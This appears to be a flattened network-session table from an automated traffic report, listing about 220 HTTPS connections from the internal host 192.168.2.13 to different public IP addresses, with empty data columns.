                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16116192.168.2.1353372121.89.60.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16117192.168.2.1346950105.46.154.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16118192.168.2.1333098111.2.180.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16119192.168.2.134882614.238.245.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16120192.168.2.1341510182.90.161.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16121192.168.2.134977257.30.165.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16122192.168.2.1341382124.199.109.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16123192.168.2.1335174152.244.218.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16124192.168.2.135687494.15.151.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16125192.168.2.1356988204.235.156.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16126192.168.2.1355220196.204.194.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16127192.168.2.135939842.172.205.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16128192.168.2.1347852160.140.99.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16129192.168.2.13559008.165.26.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16130192.168.2.1355880142.160.75.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16131192.168.2.1333962158.12.150.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16132192.168.2.135451664.196.45.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16133192.168.2.134661879.156.134.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16134192.168.2.1344726105.168.69.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16135192.168.2.1334578194.8.57.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16136192.168.2.135104678.193.36.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16137192.168.2.135439835.163.175.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16138192.168.2.13421309.209.41.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16139192.168.2.134598293.124.10.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16140192.168.2.133547059.248.58.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16141192.168.2.1349420140.35.92.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16142192.168.2.1359780176.219.11.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16143192.168.2.134466858.31.53.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16144192.168.2.1352318197.73.243.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16145192.168.2.133813663.173.198.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16146192.168.2.1332806196.218.85.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16147192.168.2.1341854137.113.3.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16148192.168.2.1341634102.23.161.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16149192.168.2.1337798126.209.226.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16150192.168.2.1347230120.86.146.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16151192.168.2.1348330126.171.160.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16152192.168.2.1350718150.172.179.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16153192.168.2.1350102119.20.142.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16154192.168.2.1349028179.64.183.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16155192.168.2.1356282155.6.156.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16156192.168.2.1356298156.253.96.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16157192.168.2.134923053.45.166.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16158192.168.2.134472468.229.253.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16159192.168.2.133483468.182.149.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16160192.168.2.134977685.188.17.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16161192.168.2.1359694217.52.197.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16162192.168.2.1359486210.22.13.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16163192.168.2.134704640.138.111.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16164192.168.2.1344902137.224.133.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16165192.168.2.1344168173.174.109.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16166192.168.2.134790448.177.136.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16167192.168.2.1345212111.183.184.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16168192.168.2.1352750186.27.157.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16169192.168.2.1359140208.169.135.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16170192.168.2.133677419.3.160.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16171192.168.2.135717496.209.236.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16172192.168.2.134459680.97.99.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16173192.168.2.1356918185.221.133.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16174192.168.2.1339964170.25.104.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16175192.168.2.1337916147.225.185.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16176192.168.2.134931613.3.129.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16177192.168.2.13536761.82.135.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16178192.168.2.133716693.84.225.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16179192.168.2.1340294176.110.55.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16180192.168.2.1345626116.215.195.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16181192.168.2.1333418185.48.152.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16182192.168.2.1334284191.31.63.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16183192.168.2.135835680.54.21.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16184192.168.2.134227880.79.12.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16185192.168.2.1359222222.34.219.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16186192.168.2.135995493.74.49.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16187192.168.2.136046435.81.151.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16188192.168.2.135849618.24.69.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16189192.168.2.134358453.255.159.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16190192.168.2.134847239.221.116.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16191192.168.2.1337450102.200.141.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16192192.168.2.134166464.157.12.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16193192.168.2.1360178213.218.240.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16194192.168.2.1356344114.14.14.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16195192.168.2.136088441.232.73.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16196192.168.2.1354256154.216.1.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16197192.168.2.1355504186.239.247.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16198192.168.2.1352252213.215.201.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16199192.168.2.1353534121.159.18.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16200192.168.2.1336864136.214.253.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16201192.168.2.1339236103.201.219.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16202192.168.2.1358150199.102.155.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16203192.168.2.1355692174.63.132.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16204192.168.2.1353506109.146.3.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16205192.168.2.135825473.235.242.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16206192.168.2.133937891.59.195.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16207192.168.2.13544088.180.231.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16208192.168.2.1344440204.127.232.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16209192.168.2.134824259.99.207.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16210192.168.2.1350860141.202.74.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16211192.168.2.1339104129.104.118.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16212192.168.2.1342532141.229.31.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16213192.168.2.134358649.174.184.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16214192.168.2.1357340117.7.45.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16215192.168.2.1358416146.7.132.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16216192.168.2.133521036.217.167.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16217192.168.2.1334250116.138.177.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16218192.168.2.1356856120.73.111.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16219192.168.2.1347466187.174.199.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16220192.168.2.135517073.114.89.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16221192.168.2.1356168168.209.137.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16222192.168.2.135260691.62.75.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16223192.168.2.1336208113.35.213.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16224192.168.2.1340564208.245.70.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16225192.168.2.134309454.109.29.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16226192.168.2.1351638112.118.241.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16227192.168.2.1336250182.98.78.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16228192.168.2.1349486104.109.165.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16229192.168.2.1360370168.82.142.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16230192.168.2.1358144134.230.196.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16231192.168.2.133509824.154.128.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16232192.168.2.134192027.24.86.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16233192.168.2.133549867.93.167.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16234192.168.2.134995076.97.255.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16235192.168.2.134533641.20.93.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16236192.168.2.1340050155.238.113.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16237192.168.2.1350298148.11.119.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16238192.168.2.1353456208.124.81.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16239192.168.2.1343752204.96.67.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16240192.168.2.133286466.87.234.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16241192.168.2.1341358177.211.92.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16242192.168.2.133783648.156.59.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16243192.168.2.133710088.123.0.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16244192.168.2.134609691.37.166.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16245192.168.2.1333268130.248.244.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16246192.168.2.1354350177.50.122.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16247192.168.2.1352358132.63.251.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16248192.168.2.135175261.90.194.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16249192.168.2.1353710193.51.102.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16250192.168.2.134122413.84.219.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16251192.168.2.134565848.91.5.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16252192.168.2.1333576166.224.234.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16253192.168.2.133661488.153.91.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16254192.168.2.13358742.179.213.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16255192.168.2.1351020146.84.58.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16256192.168.2.135169446.156.142.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16257192.168.2.134261838.0.69.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16258192.168.2.135178836.235.23.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16259192.168.2.133708490.32.230.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16260192.168.2.134221840.15.222.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16261192.168.2.134588652.164.31.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16262192.168.2.133946492.223.160.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16263192.168.2.134414073.109.64.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16264192.168.2.135340883.38.249.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16265192.168.2.135478479.219.236.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16266192.168.2.1340980102.110.60.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16267192.168.2.1342186107.23.185.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16268192.168.2.1352384200.161.82.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16269192.168.2.135097625.187.32.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16270192.168.2.134944625.73.3.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16271192.168.2.134501264.46.20.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16272192.168.2.1350964148.83.85.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16273192.168.2.1353614105.179.140.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16274192.168.2.1345036158.188.131.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16275192.168.2.133613045.73.154.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16276192.168.2.1346260188.40.38.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16277192.168.2.1351880179.132.164.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16278192.168.2.1351010149.201.254.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16279192.168.2.135435684.42.84.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16280192.168.2.1356116220.90.133.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16281192.168.2.135577693.237.175.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16282192.168.2.133721817.187.187.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16283192.168.2.1348670149.234.248.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16284192.168.2.1360194116.62.0.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16285192.168.2.135073269.174.63.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16286192.168.2.135812465.141.163.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16287192.168.2.1347878162.171.151.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16288192.168.2.134131837.241.211.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16289192.168.2.1342548183.148.117.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16290192.168.2.134540640.146.49.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16291192.168.2.134986281.164.237.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16292192.168.2.135240288.218.251.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16293192.168.2.1344708116.198.123.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16294192.168.2.133389057.93.221.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16295192.168.2.133681044.134.203.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16296192.168.2.133518893.249.183.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16297192.168.2.1354666141.42.36.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16298192.168.2.134164235.213.11.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16299192.168.2.134627259.32.229.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16300192.168.2.1337416153.59.199.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16301192.168.2.1340388166.90.200.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16302192.168.2.1343894111.194.210.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16303192.168.2.1341388150.47.23.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16304192.168.2.1346824137.28.34.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16305192.168.2.1348968222.19.155.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16306192.168.2.135162299.83.148.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16307192.168.2.1353092190.178.182.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16308192.168.2.133411025.66.25.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16309192.168.2.1359524146.170.188.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16310192.168.2.1346008147.27.227.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16311192.168.2.133311057.49.128.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16312192.168.2.1341844102.17.79.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16313192.168.2.1359306210.42.12.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16314192.168.2.1343876138.211.215.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16315192.168.2.1359702133.135.230.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16316192.168.2.1339454161.229.169.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16317192.168.2.1344030119.139.194.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16318192.168.2.1354076112.11.107.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16319192.168.2.134246620.201.113.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16320192.168.2.1356962102.23.220.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16321192.168.2.1335708205.194.255.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16322192.168.2.1354106172.67.206.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16323192.168.2.1350202148.199.47.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16324192.168.2.1352986173.152.84.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16325192.168.2.1359938133.219.18.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16326192.168.2.1356822208.7.243.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16327192.168.2.1347446119.143.99.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16328192.168.2.135393846.102.232.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16329192.168.2.133785479.31.137.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16330192.168.2.1332974172.105.255.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16331192.168.2.1360954178.104.20.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16332192.168.2.1335968201.82.160.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16333192.168.2.1339998114.125.57.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16334192.168.2.1343994110.151.246.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16335192.168.2.1357808183.185.198.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16336192.168.2.1354414149.98.134.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16337192.168.2.1352762192.227.71.17443
